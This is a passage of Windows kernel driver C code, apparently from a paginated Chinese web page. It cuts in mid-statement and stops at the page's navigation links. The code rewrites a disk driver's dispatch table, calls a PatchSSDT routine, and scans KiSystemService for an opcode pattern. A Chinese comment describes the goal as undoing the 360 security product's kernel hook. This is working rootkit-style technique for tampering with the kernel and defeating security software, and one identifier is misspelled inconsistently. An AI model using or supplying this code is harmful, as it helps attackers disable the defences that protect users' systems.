NSITIVE, *IoDriverObjectType, 0, 0, &protectdrv) )
{
if ( protectdrv )
{
if ( !ObReferenceObjectByName(&aDriverDisk, 64, 0, OBJ_CASE_INSENSITIVE, *IoDriverObjectType, 0, 0, &diskdrv) )
{
if ( diskdrv )
{
if ( diskdrv->MajorFunction[IRP_MJ_CREATE] == diskdrv->MajorFunction[IRP_MJ_CLOSE ] )
{
mjcreate = (ULONG)diskdrv->MajorFunction[IRP_MJ_CREATE];
i=0;
while(i<=IRP_MJ_MAXIMUM_FUNCTION)
diskdrv->MajorFunction[i++]=(PDRIVER_DISPATCH)mjcreate;
}
}
}
}
}
PatchSSDT();
systemservice=(ULONG)ZwAccessCheckAndAuditAlarm+13+*(ULONG*)((ULONG)ZwAccessCheckAndAudITAlarm+13)+4;
DbgPrint("KiSystemService - %x",systemservice);
count=0;
foundaddr=0;
while(count<0x300)
{
if(*(unsigned char*)(systemservice+count)==0x8B&&
*(unsigned char*)(systemservice+count+1)==0x1C&&
*(unsigned char*)(systemservice+count+2)==0x87)
{
foundaddr=systemservice+count+3;
break;
}
count++;
}
//还原360保险箱对KiSystemService的钩子
/*
804d5e77 8b1c87 mov ebx,dword ptr [edi+eax*4]
804d5e7a 2be1 sub esp,ecx
804d5e7c c1e902 shr ecx,2
804d5e7f 8bfc mov edi,esp
804d5e81 3b35b4745480 cmp esi,dword ptr [nt!MmUserProbeAddress (805474b4)]
*/
if(foundaddr){
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >>
|
